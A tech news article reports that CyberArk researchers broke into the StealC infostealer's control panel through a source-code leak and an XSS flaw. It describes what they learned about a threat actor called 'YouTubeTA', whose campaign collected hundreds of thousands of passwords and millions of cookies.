- CyberArk exploited StealC’s control panel via source leak and XSS flaws
- Researchers Unveiled Attacker “YouTubeTA” That Stole 390,000 Passwords and 30 Million Cookies
- Findings could disrupt StealC operations by attracting additional investigations and attacks
Cybersecurity researchers have managed to break into the web-based control panel of StealC infostealer and gain valuable information about how the malware works and who both the attackers and victims are.
StealC is an immensely popular infostealer malware that first appeared a few years ago and has since become a mainstay of the cybercriminal community.
It can collect and exfiltrate sensitive data such as web browser credentials, cookies, system information, messaging app and email data, as well as cryptocurrency wallet details, and it offers various features such as modular targeting, stealthy execution, and flexible command-and-control communication.
Doxxing victims
CyberArk security researchers found two ways to access the control panel; through a source code leak that happened around April 2025 and through a cross-site scripting (XSS) vulnerability they discovered.
“By exploiting the vulnerability, we were able to identify characteristics of the threat actor’s computers, including general location indicators and computer hardware details,” the researchers said. “Additionally, we were able to retrieve active session cookies, which allowed us to gain control over sessions from our own machines.”
The report describes a threat actor, dubbed “YouTubeTA,” who used stolen credentials to log into legitimate YouTube channels and plant links to the malware. The campaign brought YouTubeTA more than 5,000 victim logs, 390,000 passwords and 30 million cookies.
CyberArk discovered that the attacker was using an Apple M3-based device with English and Russian language settings. The time zone was set to Eastern Europe, and on at least one occasion they logged in from Ukraine. Normally, cybercriminals would only log in via a VPN to cover their tracks, but this threat actor forgot to do so once and revealed their IP address, which is linked to Ukrainian ISP TRK Cable TV.
By releasing this news, CyberArk hopes that StealC will also be targeted by other players, both benign and malicious, disrupting the entire operation.
Via Bleeping Computer
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews and opinions in your feeds. Be sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, video unboxings, and get regular updates from us on WhatsApp also.
